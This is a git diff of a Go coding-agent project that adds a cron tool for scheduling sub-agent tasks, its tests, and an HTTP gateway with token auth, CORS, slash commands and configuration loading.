+	req, err := http.NewRequest("POST", job.A2ATarget+"/a2a", bytes.NewReader(body))
+	if err != nil {
+		return fmt.Errorf("create request: %w", err)
+	}
+	req.Header.Set("Content-Type", "application/json")
+	if job.A2AToken != "" {
+		req.Header.Set("Authorization", "Bearer "+job.A2AToken)
 	}
 
-	// Compute next run (simple: 1 hour from now)
-	job.NextRun = time.Now().Add(time.Hour)
+	resp, err := a2aHTTPClient.Do(req)
+	if err != nil {
+		return fmt.Errorf("a2a request: %w", err)
+	}
+	defer resp.Body.Close()
 
-	s.store.Update(job)
+	if resp.StatusCode != http.StatusOK {
+		return fmt.Errorf("a2a request: status %d", resp.StatusCode)
+	}
 
-	// Clean up the sub-agent
-	s.manager.Destroy(a.ID())
+	var result struct {
+		Error *struct {
+			Message string `json:"message"`
+		} `json:"error"`
+	}
+	if err := json.NewDecoder(io.LimitReader(resp.Body, maxA2AResponseBytes)).Decode(&result); err != nil {
+		return fmt.Errorf("decode response: %w", err)
+	}
+	if result.Error != nil {
+		return fmt.Errorf("a2a error: %s", result.Error.Message)
+	}
+	return nil
 }
diff --git a/internal/cron/tool.go b/internal/cron/tool.go
new file mode 100644
index 0000000..77a3aa5
--- /dev/null
+++ b/internal/cron/tool.go
@@ -0,0 +1,266 @@
+package cron
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"strings"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/tools"
+	"github.com/startvibecoding/vibecoding/internal/util"
+)
+
+// CronTool provides cron job management for the agent.
+type CronTool struct {
+	store     CronStore
+	scheduler *Scheduler
+}
+
+// NewCronTool creates a new cron management tool.
+func NewCronTool(store CronStore, scheduler *Scheduler) *CronTool {
+	return &CronTool{store: store, scheduler: scheduler}
+}
+
+func (t *CronTool) Name() string {
+	return "cron"
+}
+
+func (t *CronTool) Description() string {
+	return "Manage scheduled tasks (cron jobs). Create one-time or periodic background tasks that run via sub-agents."
+}
+
+func (t *CronTool) PromptSnippet() string {
+	return "Manage scheduled background tasks (one-time or periodic)"
+}
+
+func (t *CronTool) PromptGuidelines() []string {
+	return []string{
+		"The `cron` tool manages scheduled background tasks that run via sub-agents.",
+		"Use `cron(action=\"list\")` to see existing tasks.",
+		"Use `cron(action=\"create\", name=\"...\", prompt=\"...\", schedule=\"@daily\")` for periodic tasks.",
+		"Use `cron(action=\"create\", name=\"...\", prompt=\"...\", oneshot=true)` for one-time tasks.",
+		"Schedule formats: `@daily`, `@weekly`, `@monthly`, `@hourly`, `@every 30m`, `@every 2h`, or empty for one-shot.",
+		"Use `cron(action=\"run\", id=\"...\")` to trigger a task immediately.",
+	}
+}
+
+func (t *CronTool) Parameters() json.RawMessage {
+	return json.RawMessage(`{
+		"type": "object",
+		"properties": {
+			"action": {
+				"type": "string",
+				"description": "Action: list, create, enable, disable, remove, run",
+				"enum": ["list", "create", "enable", "disable", "remove", "run"]
+			},
+			"id": {
+				"type": "string",
+				"description": "Job ID (required for enable, disable, remove, run)"
+			},
+			"name": {
+				"type": "string",
+				"description": "Short task name (required for create)"
+			},
+			"prompt": {
+				"type": "string",
+				"description": "Task prompt for the sub-agent (required for create)"
+			},
+			"schedule": {
+				"type": "string",
+				"description": "Schedule: @daily, @weekly, @monthly, @hourly, @every 30m, @every 2h, or empty/omit for one-shot"
+			},
+			"oneshot": {
+				"type": "boolean",
+				"description": "If true, run once then auto-disable (default: false). Same as omitting schedule."
+			},
+			"mode": {
+				"type": "string",
+				"description": "Agent mode for the task: agent, yolo (default: yolo)",
+				"enum": ["agent", "yolo"]
+			}
+		},
+		"required": ["action"]
+	}`)
+}
+
+func (t *CronTool) Execute(ctx context.Context, params map[string]any) (tools.ToolResult, error) {
+	action, _ := params["action"].(string)
+
+	switch action {
+	case "list":
+		return t.executeList()
+	case "create":
+		name, _ := params["name"].(string)
+		prompt, _ := params["prompt"].(string)
+		schedule, _ := params["schedule"].(string)
+		oneShot, _ := params["oneshot"].(bool)
+		mode, _ := params["mode"].(string)
+		return t.executeCreate(name, prompt, schedule, oneShot, mode)
+	case "enable":
+		id, _ := params["id"].(string)
+		return t.executeSetEnabled(id, true)
+	case "disable":
+		id, _ := params["id"].(string)
+		return t.executeSetEnabled(id, false)
+	case "remove":
+		id, _ := params["id"].(string)
+		return t.executeRemove(id)
+	case "run":
+		id, _ := params["id"].(string)
+		return t.executeRun(id)
+	default:
+		return tools.ToolResult{}, fmt.Errorf("unknown action: %s (use: list, create, enable, disable, remove, run)", action)
+	}
+}
+
+func (t *CronTool) executeList() (tools.ToolResult, error) {
+	jobs, err := t.store.List()
+	if err != nil {
+		return tools.ToolResult{}, fmt.Errorf("list cron jobs: %w", err)
+	}
+	if len(jobs) == 0 {
+		return tools.NewTextToolResult("No cron jobs configured."), nil
+	}
+
+	var sb strings.Builder
+	sb.WriteString(fmt.Sprintf("Cron jobs (%d):\n\n", len(jobs)))
+	for _, j := range jobs {
+		status := "✅ enabled"
+		if !j.Enabled {
+			status = "⏸ disabled"
+		}
+		if j.LastStatus == "failed" {
+			status = "❌ failed"
+		}
+		if j.LastStatus == "running" {
+			status = "🔄 running"
+		}
+		sb.WriteString(fmt.Sprintf("- [%s] %s\n  Status: %s | Mode: %s | Schedule: %s | Runs: %d\n  Prompt: %s\n",
+			j.ID, j.Name, status, j.Mode, scheduleStr(j.Schedule, j.OneShot), j.RunCount, truncateStr(j.Prompt, 80)))
+		if !j.LastRun.IsZero() {
+			sb.WriteString(fmt.Sprintf("  Last run: %s\n", j.LastRun.Format(time.RFC3339)))
+		}
+		if j.LastError != "" {
+			sb.WriteString(fmt.Sprintf("  Error: %s\n", j.LastError))
+		}
+		sb.WriteString("\n")
+	}
+	return tools.NewTextToolResult(sb.String()), nil
+}
+
+func (t *CronTool) executeCreate(name, prompt, schedule string, oneShot bool, mode string) (tools.ToolResult, error) {
+	if name == "" {
+		return tools.ToolResult{}, fmt.Errorf("name is required for create")
+	}
+	if prompt == "" {
+		return tools.ToolResult{}, fmt.Errorf("prompt is required for create")
+	}
+	if mode == "" {
+		mode = "yolo"
+	}
+
+	// Determine if one-shot: explicit oneshot=true or empty schedule (and not a periodic schedule)
+	isOneShot := oneShot
+	if !isOneShot && schedule == "" {
+		isOneShot = true // Default: no schedule = one-shot
+	}
+
+	// Compute NextRun for periodic tasks
+	var nextRun time.Time
+	if !isOneShot && schedule != "" {
+		next, _, err := ParseSchedule(schedule, time.Now())
+		if err != nil {
+			return tools.ToolResult{}, fmt.Errorf("invalid schedule: %w", err)
+		}
+		nextRun = next
+	}
+
+	job, err := t.store.Create(CronJob{
+		Name:     name,
+		Prompt:   prompt,
+		Schedule: schedule,
+		OneShot:  isOneShot,
+		Enabled:  true,
+		Mode:     mode,
+		NextRun:  nextRun,
+	})
+	if err != nil {
+		return tools.ToolResult{}, fmt.Errorf("create cron job: %w", err)
+	}
+
+	kind := "periodic"
+	if isOneShot {
+		kind = "one-shot"
+	}
+	nextInfo := ""
+	if !nextRun.IsZero() {
+		nextInfo = fmt.Sprintf("\n  Next run: %s", nextRun.Format(time.RFC3339))
+	}
+	return tools.NewTextToolResult(fmt.Sprintf("✅ Cron job created (%s):\n  ID: %s\n  Name: %s\n  Schedule: %s\n  Mode: %s%s\n  Prompt: %s",
+		kind, job.ID, job.Name, scheduleStr(job.Schedule, isOneShot), job.Mode, nextInfo, truncateStr(job.Prompt, 100))), nil
+}
+
+func scheduleStr(schedule string, oneShot bool) string {
+	if oneShot {
+		return "(one-shot)"
+	}
+	if schedule == "" {
+		return "(one-shot)"
+	}
+	return schedule
+}
+
+func (t *CronTool) executeSetEnabled(id string, enabled bool) (tools.ToolResult, error) {
+	if id == "" {
+		return tools.ToolResult{}, fmt.Errorf("id is required")
+	}
+	job, err := t.store.Get(id)
+	if err != nil {
+		return tools.ToolResult{}, err
+	}
+	job.Enabled = enabled
+	if err := t.store.Update(*job); err != nil {
+		return tools.ToolResult{}, fmt.Errorf("update cron job: %w", err)
+	}
+	action := "enabled"
+	if !enabled {
+		action = "disabled"
+	}
+	return tools.NewTextToolResult(fmt.Sprintf("✅ Cron job %s %s: %s", job.ID, action, job.Name)), nil
+}
+
+func (t *CronTool) executeRemove(id string) (tools.ToolResult, error) {
+	if id == "" {
+		return tools.ToolResult{}, fmt.Errorf("id is required")
+	}
+	job, err := t.store.Get(id)
+	if err != nil {
+		return tools.ToolResult{}, err
+	}
+	name := job.Name
+	if err := t.store.Delete(id); err != nil {
+		return tools.ToolResult{}, fmt.Errorf("delete cron job: %w", err)
+	}
+	return tools.NewTextToolResult(fmt.Sprintf("🗑 Cron job removed: %s (%s)", id, name)), nil
+}
+
+func (t *CronTool) executeRun(id string) (tools.ToolResult, error) {
+	if id == "" {
+		return tools.ToolResult{}, fmt.Errorf("id is required")
+	}
+	job, err := t.store.Get(id)
+	if err != nil {
+		return tools.ToolResult{}, err
+	}
+	// Trigger by resetting LastRun so scheduler picks it up on next tick
+	job.LastRun = time.Time{}
+	if err := t.store.Update(*job); err != nil {
+		return tools.ToolResult{}, fmt.Errorf("update cron job: %w", err)
+	}
+	return tools.NewTextToolResult(fmt.Sprintf("▶ Cron job %s triggered: %s (will run on next scheduler tick)", job.ID, job.Name)), nil
+}
+
+func truncateStr(s string, maxLen int) string {
+	return util.TruncateWithSuffix(s, maxLen, "...")
+}
diff --git a/internal/cron/tool_test.go b/internal/cron/tool_test.go
new file mode 100644
index 0000000..cd51039
--- /dev/null
+++ b/internal/cron/tool_test.go
@@ -0,0 +1,201 @@
+package cron
+
+import (
+	"context"
+	"testing"
+)
+
+func TestCronToolCreateOneShot(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	result, err := tool.Execute(context.Background(), map[string]any{
+		"action":  "create",
+		"name":    "test-task",
+		"prompt":  "do something",
+		"oneshot": true,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if result.Text == "" {
+		t.Error("expected non-empty result")
+	}
+
+	jobs, _ := store.List()
+	if len(jobs) != 1 {
+		t.Fatalf("expected 1 job, got %d", len(jobs))
+	}
+	if !jobs[0].OneShot {
+		t.Error("expected oneshot=true")
+	}
+	if jobs[0].Schedule != "" {
+		t.Errorf("expected empty schedule, got %q", jobs[0].Schedule)
+	}
+}
+
+func TestCronToolCreatePeriodic(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	result, err := tool.Execute(context.Background(), map[string]any{
+		"action":   "create",
+		"name":     "daily-check",
+		"prompt":   "check status",
+		"schedule": "@daily",
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if result.Text == "" {
+		t.Error("expected non-empty result")
+	}
+
+	jobs, _ := store.List()
+	if len(jobs) != 1 {
+		t.Fatalf("expected 1 job, got %d", len(jobs))
+	}
+	if jobs[0].OneShot {
+		t.Error("expected oneshot=false for periodic")
+	}
+	if jobs[0].Schedule != "@daily" {
+		t.Errorf("expected schedule @daily, got %q", jobs[0].Schedule)
+	}
+	if jobs[0].NextRun.IsZero() {
+		t.Error("expected non-zero NextRun for periodic job")
+	}
+}
+
+func TestCronToolCreateDefaultOneShot(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	_, err := tool.Execute(context.Background(), map[string]any{
+		"action": "create",
+		"name":   "default-task",
+		"prompt": "do stuff",
+		// no schedule, no oneshot → should default to one-shot
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	jobs, _ := store.List()
+	if !jobs[0].OneShot {
+		t.Error("expected default to be one-shot when no schedule")
+	}
+}
+
+func TestCronToolList(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	// Empty list
+	result, _ := tool.Execute(context.Background(), map[string]any{"action": "list"})
+	if result.Text != "No cron jobs configured." {
+		t.Errorf("unexpected empty list: %s", result.Text)
+	}
+
+	// Add a job and list
+	store.Create(CronJob{Name: "test", Prompt: "test", Enabled: true})
+	result, _ = tool.Execute(context.Background(), map[string]any{"action": "list"})
+	if result.Text == "No cron jobs configured." {
+		t.Error("expected non-empty list")
+	}
+}
+
+func TestCronToolEnableDisable(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	job, _ := store.Create(CronJob{Name: "test", Prompt: "test", Enabled: true})
+
+	// Disable
+	_, err := tool.Execute(context.Background(), map[string]any{
+		"action": "disable",
+		"id":     job.ID,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	j, _ := store.Get(job.ID)
+	if j.Enabled {
+		t.Error("expected disabled")
+	}
+
+	// Enable
+	_, err = tool.Execute(context.Background(), map[string]any{
+		"action": "enable",
+		"id":     job.ID,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	j, _ = store.Get(job.ID)
+	if !j.Enabled {
+		t.Error("expected enabled")
+	}
+}
+
+func TestCronToolRemove(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	job, _ := store.Create(CronJob{Name: "test", Prompt: "test", Enabled: true})
+
+	_, err := tool.Execute(context.Background(), map[string]any{
+		"action": "remove",
+		"id":     job.ID,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	jobs, _ := store.List()
+	if len(jobs) != 0 {
+		t.Errorf("expected 0 jobs after remove, got %d", len(jobs))
+	}
+}
+
+func TestCronToolMissingParams(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	// Create without name
+	_, err := tool.Execute(context.Background(), map[string]any{
+		"action": "create",
+		"prompt": "test",
+	})
+	if err == nil {
+		t.Error("expected error for missing name")
+	}
+
+	// Create without prompt
+	_, err = tool.Execute(context.Background(), map[string]any{
+		"action": "create",
+		"name":   "test",
+	})
+	if err == nil {
+		t.Error("expected error for missing prompt")
+	}
+
+	// Enable without id
+	_, err = tool.Execute(context.Background(), map[string]any{
+		"action": "enable",
+	})
+	if err == nil {
+		t.Error("expected error for missing id")
+	}
+}
+
+func TestCronToolUnknownAction(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	_, err := tool.Execute(context.Background(), map[string]any{
+		"action": "invalid",
+	})
+	if err == nil {
+		t.Error("expected error for unknown action")
+	}
+}
diff --git a/internal/gateway/auth.go b/internal/gateway/auth.go
new file mode 100644
index 0000000..c164b5a
--- /dev/null
+++ b/internal/gateway/auth.go
@@ -0,0 +1,97 @@
+package gateway
+
+import (
+	"net/http"
+	"strings"
+)
+
+// AuthMiddleware returns an HTTP middleware that validates Bearer tokens.
+// If auth is disabled, the handler is called directly.
+func AuthMiddleware(cfg AuthConfig, next http.Handler) http.Handler {
+	if !cfg.Enabled || len(cfg.Tokens) == 0 {
+		return next
+	}
+	tokenSet := make(map[string]struct{}, len(cfg.Tokens))
+	for _, t := range cfg.Tokens {
+		tokenSet[t] = struct{}{}
+	}
+	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		token := extractBearerToken(r)
+		if token == "" {
+			writeError(w, http.StatusUnauthorized, "missing or invalid Authorization header", "authentication_error")
+			return
+		}
+		if _, ok := tokenSet[token]; !ok {
+			writeError(w, http.StatusUnauthorized, "invalid API key", "authentication_error")
+			return
+		}
+		next.ServeHTTP(w, r)
+	})
+}
+
+// CORSMiddleware adds CORS headers when enabled.
+func CORSMiddleware(cfg CORSConfig, next http.Handler) http.Handler {
+	if !cfg.Enabled {
+		return next
+	}
+	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if origin := allowedCORSOrigin(cfg, r.Header.Get("Origin")); origin != "" {
+			w.Header().Set("Access-Control-Allow-Origin", origin)
+		}
+		w.Header().Set("Access-Control-Allow-Methods", "GET, POST, DELETE, OPTIONS")
+		w.Header().Set("Access-Control-Allow-Headers", "Content-Type, Authorization")
+		if r.Method == http.MethodOptions {
+			w.WriteHeader(http.StatusNoContent)
+			return
+		}
+		next.ServeHTTP(w, r)
+	})
+}
+
+func allowedCORSOrigin(cfg CORSConfig, requestOrigin string) string {
+	if len(cfg.AllowOrigins) == 0 {
+		return "*"
+	}
+	for _, allowed := range cfg.AllowOrigins {
+		if allowed == "*" {
+			return "*"
+		}
+		if requestOrigin != "" && allowed == requestOrigin {
+			return requestOrigin
+		}
+	}
+	if requestOrigin == "" && len(cfg.AllowOrigins) == 1 {
+		return cfg.AllowOrigins[0]
+	}
+	return ""
+}
+
+// ConcurrencyMiddleware limits the number of concurrent in-flight requests.
+// If maxConcurrent <= 0, no limit is applied.
+func ConcurrencyMiddleware(maxConcurrent int, next http.Handler) http.Handler {
+	if maxConcurrent <= 0 {
+		return next
+	}
+	sem := make(chan struct{}, maxConcurrent)
+	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		select {
+		case sem <- struct{}{}:
+			defer func() { <-sem }()
+			next.ServeHTTP(w, r)
+		default:
+			writeError(w, http.StatusTooManyRequests, "server is at capacity, please retry later", "rate_limit_error")
+		}
+	})
+}
+
+func extractBearerToken(r *http.Request) string {
+	auth := r.Header.Get("Authorization")
+	if auth == "" {
+		return ""
+	}
+	const prefix = "Bearer "
+	if !strings.HasPrefix(auth, prefix) {
+		return ""
+	}
+	return strings.TrimSpace(auth[len(prefix):])
+}
diff --git a/internal/gateway/commands.go b/internal/gateway/commands.go
new file mode 100644
index 0000000..6848c36
--- /dev/null
+++ b/internal/gateway/commands.go
@@ -0,0 +1,234 @@
+package gateway
+
+import (
+	"fmt"
+	"strings"
+)
+
+// CommandResult holds the output of a slash command.
+type CommandResult struct {
+	Message string
+	Error   bool
+}
+
+// handleCommand processes a /xxx slash command.
+// Returns nil if the input is not a command (should go to agent).
+func (s *Server) handleCommand(sess *GatewaySession, input string) *CommandResult {
+	trimmed := strings.TrimSpace(input)
+	if !strings.HasPrefix(trimmed, "/") {
+		return nil
+	}
+
+	parts := strings.Fields(trimmed)
+	if len(parts) == 0 {
+		return nil
+	}
+
+	cmd := parts[0]
+	switch cmd {
+	case "/clear":
+		return s.cmdClear(sess)
+	case "/mode":
+		return s.cmdMode(sess, parts)
+	case "/model":
+		return s.cmdModel(parts)
+	case "/models":
+		return s.cmdModels()
+	case "/sessions":
+		return s.cmdSessions(parts)
+	case "/status":
+		return s.cmdStatus(sess)
+	case "/compact":
+		return s.cmdCompact(sess)
+	case "/skill":
+		return s.cmdSkill(parts)
+	case "/skills":
+		return s.cmdSkills()
+	case "/help":
+		return s.cmdHelp()
+	default:
+		return &CommandResult{Message: fmt.Sprintf("Unknown command: %s. Type /help for available commands.", cmd), Error: true}
+	}
+}
+
+func (s *Server) cmdClear(sess *GatewaySession) *CommandResult {
+	if sess == nil {
+		return &CommandResult{Message: "No active session to clear.", Error: true}
+	}
+	// The session manager keeps the JSONL file, but we reset the in-memory state.
+	// The caller will set agent=nil so the next request builds a fresh agent.
+	return &CommandResult{Message: "✅ Conversation cleared"}
+}
+
+func (s *Server) cmdMode(sess *GatewaySession, parts []string) *CommandResult {
+	if len(parts) > 1 {
+		switch parts[1] {
+		case "plan", "agent", "yolo":
+			if sess != nil {
+				sess.Mode = parts[1]
+			}
+			return &CommandResult{Message: fmt.Sprintf("Mode: %s", strings.ToUpper(parts[1]))}
+		default:
+			return &CommandResult{Message: "Invalid mode. Use: plan, agent, yolo", Error: true}
+		}
+	}
+	mode := s.cfg.DefaultMode
+	if sess != nil && sess.Mode != "" {
+		mode = sess.Mode
+	}
+	return &CommandResult{Message: fmt.Sprintf("Current mode: %s", strings.ToUpper(mode))}
+}
+
+func (s *Server) cmdModel(parts []string) *CommandResult {
+	if len(parts) > 1 {
+		modelID := parts[1]
+		newModel := s.provider.GetModel(modelID)
+		if newModel == nil {
+			return &CommandResult{Message: fmt.Sprintf("Model not found: %s. Use /models to list available models.", modelID), Error: true}
+		}
+		s.mu.Lock()
+		s.model = newModel
+		s.mu.Unlock()
+		return &CommandResult{Message: fmt.Sprintf("✅ Model switched to: %s (%s)", newModel.Name, newModel.ID)}
+	}
+	s.mu.RLock()
+	m := s.model
+	s.mu.RUnlock()
+	return &CommandResult{Message: fmt.Sprintf("Current model: %s (%s)", m.Name, m.ID)}
+}
+
+func (s *Server) cmdModels() *CommandResult {
+	models := s.provider.Models()
+	if len(models) == 0 {
+		return &CommandResult{Message: "No models available."}
+	}
+	var sb strings.Builder
+	sb.WriteString("Available models:\n")
+	s.mu.RLock()
+	currentID := s.model.ID
+	s.mu.RUnlock()
+	for _, m := range models {
+		marker := " "
+		if m.ID == currentID {
+			marker = "*"
+		}
+		sb.WriteString(fmt.Sprintf("  [%s] %s (%s)\n", marker, m.Name, m.ID))
+	}
+	return &CommandResult{Message: sb.String()}
+}
+
+func (s *Server) cmdSessions(parts []string) *CommandResult {
+	sub := "ls"
+	if len(parts) > 1 {
+		sub = strings.ToLower(parts[1])
+	}
+	switch sub {
+	case "ls", "list":
+		ids := s.pool.List()
+		if len(ids) == 0 {
+			return &CommandResult{Message: "No active sessions."}
+		}
+		var sb strings.Builder
+		sb.WriteString(fmt.Sprintf("Active sessions (%d):\n", len(ids)))
+		for _, id := range ids {
+			sb.WriteString(fmt.Sprintf("  - %s\n", id))
+		}
+		return &CommandResult{Message: sb.String()}
+	case "clear", "new":
+		return &CommandResult{Message: "✅ Use a new x_session_id to start a fresh session."}
+	case "del", "delete", "rm":
+		if len(parts) < 3 {
+			return &CommandResult{Message: "Usage: /sessions del <id>", Error: true}
+		}
+		id := parts[2]
+		if s.pool.Get(id) == nil {
+			return &CommandResult{Message: fmt.Sprintf("Session not found: %s", id), Error: true}
+		}
+		s.pool.Remove(id)
+		return &CommandResult{Message: fmt.Sprintf("✅ Session %s deleted.", id)}
+	default:
+		return &CommandResult{Message: "Usage: /sessions [ls|clear|del <id>]", Error: true}
+	}
+}
+
+func (s *Server) cmdStatus(sess *GatewaySession) *CommandResult {
+	if sess == nil {
+		return &CommandResult{Message: "No active session.", Error: true}
+	}
+	mode := s.cfg.DefaultMode
+	if sess.Mode != "" {
+		mode = sess.Mode
+	}
+	s.mu.RLock()
+	modelID := s.model.ID
+	s.mu.RUnlock()
+	msgCount := 0
+	if sess.Manager != nil {
+		msgCount = len(sess.Manager.GetMessages())
+	}
+	msg := fmt.Sprintf("Session: %s\nMode: %s\nModel: %s\nMessages: %d\nWorkDir: %s",
+		sess.ID, strings.ToUpper(mode), modelID, msgCount, sess.WorkDir)
+	return &CommandResult{Message: msg}
+}
+
+func (s *Server) cmdCompact(sess *GatewaySession) *CommandResult {
+	if sess == nil {
+		return &CommandResult{Message: "No active session.", Error: true}
+	}
+
+	// Check if there are enough messages to compact
+	if sess.Manager != nil && len(sess.Manager.GetMessages()) < 2 {
+		return &CommandResult{Message: "Nothing to compact: conversation is too short.", Error: true}
+	}
+
+	// Set the force flag so the next agent run triggers compaction
+	sess.ForceCompact = true
+	return &CommandResult{Message: "✅ Context compaction will be triggered on the next request."}
+}
+
+func (s *Server) cmdSkill(parts []string) *CommandResult {
+	if s.skillsMgr == nil {
+		return &CommandResult{Message: "No skills available.", Error: true}
+	}
+	if len(parts) < 2 {
+		return s.cmdSkills()
+	}
+	name := parts[1]
+	skill := s.skillsMgr.Get(name)
+	if skill == nil {
+		return &CommandResult{Message: fmt.Sprintf("Skill not found: %s", name), Error: true}
+	}
+	return &CommandResult{Message: fmt.Sprintf("✅ Skill '%s' activated: %s", name, skill.Description)}
+}
+
+func (s *Server) cmdSkills() *CommandResult {
+	if s.skillsMgr == nil {
+		return &CommandResult{Message: "No skills available."}
+	}
+	skillList := s.skillsMgr.List()
+	if len(skillList) == 0 {
+		return &CommandResult{Message: "No skills found."}
+	}
+	var sb strings.Builder
+	sb.WriteString("Available skills:\n")
+	for _, sk := range skillList {
+		sb.WriteString(fmt.Sprintf("  - %s (%s): %s\n", sk.Name, sk.Source, sk.Description))
+	}
+	return &CommandResult{Message: sb.String()}
+}
+
+func (s *Server) cmdHelp() *CommandResult {
+	help := `Available commands:
+  /clear                  - Clear conversation context
+  /mode [plan|agent|yolo] - Show or switch mode
+  /model [model_id]       - Show or switch model
+  /models                 - List available models
+  /sessions               - List active sessions
+  /sessions del <id>      - Delete a session
+  /compact                - Trigger context compaction
+  /status                 - Show session status
+  /skill <name>           - Activate a skill
+  /skills                 - List available skills
+  /help                   - Show this help`
+	return &CommandResult{Message: help}
+}
diff --git a/internal/gateway/config.go b/internal/gateway/config.go
new file mode 100644
index 0000000..581d492
--- /dev/null
+++ b/internal/gateway/config.go
@@ -0,0 +1,256 @@
+package gateway
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+// GatewayConfig holds all gateway-specific configuration.
+type GatewayConfig struct {
+	Listen               string               `json:"listen,omitempty"`
+	Auth                 AuthConfig            `json:"auth"`
+	DefaultMode          string                `json:"defaultMode,omitempty"`
+	DefaultThinkingLevel string                `json:"defaultThinkingLevel,omitempty"`
+	EnableSubAgents      bool                  `json:"enableSubAgents,omitempty"`
+	Sandbox              GatewaySandboxConfig  `json:"sandbox"`
+	AllowedWorkDirs      *[]string             `json:"allowedWorkDirs,omitempty"` // nil=no check, []=deny all overrides
+	Session              SessionConfig         `json:"session"`
+	WorkingDir           string                `json:"workingDir,omitempty"`
+	CORS                 CORSConfig            `json:"cors"`
+	Provider             string                `json:"provider,omitempty"`
+	Model                string                `json:"model,omitempty"`
+	ToolVisibility       ToolVisibilityConfig  `json:"toolVisibility"`
+	SystemPromptMode     string                `json:"systemPromptMode,omitempty"` // "append" (default), "ignore"
+	RequestTimeoutSecs   int                   `json:"requestTimeoutSeconds,omitempty"`
+	MaxConcurrentReqs    int                   `json:"maxConcurrentRequests,omitempty"`
+	LogLevel             string                `json:"logLevel,omitempty"`
+}
+
+// AuthConfig controls bearer token authentication.
+type AuthConfig struct {
+	Enabled bool     `json:"enabled"`
+	Tokens  []string `json:"tokens,omitempty"`
+}
+
+// GatewaySandboxConfig controls sandbox for gateway mode.
+type GatewaySandboxConfig struct {
+	Enabled bool   `json:"enabled"`
+	Level   string `json:"level,omitempty"` // "none", "standard", "strict"; empty=auto from mode
+}
+
+// SessionConfig controls session pool behavior.
+type SessionConfig struct {
+	IdleTimeoutSeconds int `json:"idleTimeoutSeconds,omitempty"`
+	MaxSessions        int `json:"maxSessions,omitempty"`
+}
+
+// CORSConfig controls cross-origin resource sharing.
+type CORSConfig struct {
+	Enabled      bool     `json:"enabled"`
+	AllowOrigins []string `json:"allowOrigins,omitempty"`
+}
+
+// ToolVisibilityConfig controls how tool calls are exposed to the client.
+type ToolVisibilityConfig struct {
+	// Mode controls the transport for tool status:
+	//   "content" (default) — tool output mixed into content stream
+	//   "sse_event" — tool output via separate SSE events
+	//   "none" — no tool output
+	Mode string `json:"mode,omitempty"`
+
+	// Detail controls the verbosity of tool output in content mode:
+	//   "collapsed" (default) — one-line summary: 🔧 `read` main.go
+	//                           edit always shows path + diff
+	//   "expanded" — full output with code fences (Ctrl+O style)
+	Detail string `json:"detail,omitempty"`
+}
+
+// DefaultGatewayConfig returns the default gateway configuration.
+func DefaultGatewayConfig() *GatewayConfig {
+	return &GatewayConfig{
+		Listen:               ":8080",
+		Auth:                 AuthConfig{Enabled: false},
+		DefaultMode:          "yolo",
+		DefaultThinkingLevel: "medium",
+		EnableSubAgents:      false,
+		Sandbox:              GatewaySandboxConfig{Enabled: false},
+		Session:              SessionConfig{IdleTimeoutSeconds: 1800},
+		CORS:                 CORSConfig{Enabled: false, AllowOrigins: []string{"*"}},
+		ToolVisibility:       ToolVisibilityConfig{Mode: "content", Detail: "collapsed"},
+		SystemPromptMode:     "append",
+		RequestTimeoutSecs:   1800,
+		LogLevel:             "info",
+	}
+}
+
+// GatewayConfigPath returns the path to the global gateway.json.
+func GatewayConfigPath() string {
+	return filepath.Join(config.ConfigDir(), "gateway.json")
+}
+
+// ProjectGatewayConfigPath returns the path to the project-level gateway.json.
+func ProjectGatewayConfigPath() string {
+	return filepath.Join(".vibe", "gateway.json")
+}
+
+// LoadGatewayConfig loads the gateway configuration, merging global + project.
+// Priority: .vibe/gateway.json > ~/.vibecoding/gateway.json > defaults
+func LoadGatewayConfig() (*GatewayConfig, error) {
+	cfg, err := LoadGatewayConfigFrom(GatewayConfigPath())
+	if err != nil {
+		return nil, err
+	}
+	// Overlay project-level config
+	projectPath := ProjectGatewayConfigPath()
+	if data, err := os.ReadFile(projectPath); err == nil {
+		if err := json.Unmarshal(data, cfg); err != nil {
+			return nil, fmt.Errorf("parse project gateway config %s: %w", projectPath, err)
+		}
+	}
+	normalizeConfig(cfg)
+	return cfg, nil
+}
+
+// LoadGatewayConfigFrom loads gateway configuration from a specific path (no project merge).
+func LoadGatewayConfigFrom(path string) (*GatewayConfig, error) {
+	cfg := DefaultGatewayConfig()
+
+	data, err := os.ReadFile(path)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return cfg, nil // use defaults
+		}
+		return nil, fmt.Errorf("read gateway config: %w", err)
+	}
+
+	if err := json.Unmarshal(data, cfg); err != nil {
+		return nil, fmt.Errorf("parse gateway config: %w", err)
+	}
+
+	normalizeConfig(cfg)
+	return cfg, nil
+}
+
+// normalizeConfig fills in defaults for empty fields.
+func normalizeConfig(cfg *GatewayConfig) {
+	if cfg.Listen == "" {
+		cfg.Listen = ":8080"
+	}
+	if cfg.DefaultMode == "" {
+		cfg.DefaultMode = "yolo"
+	}
+	if cfg.ToolVisibility.Mode == "" {
+		cfg.ToolVisibility.Mode = "content"
+	}
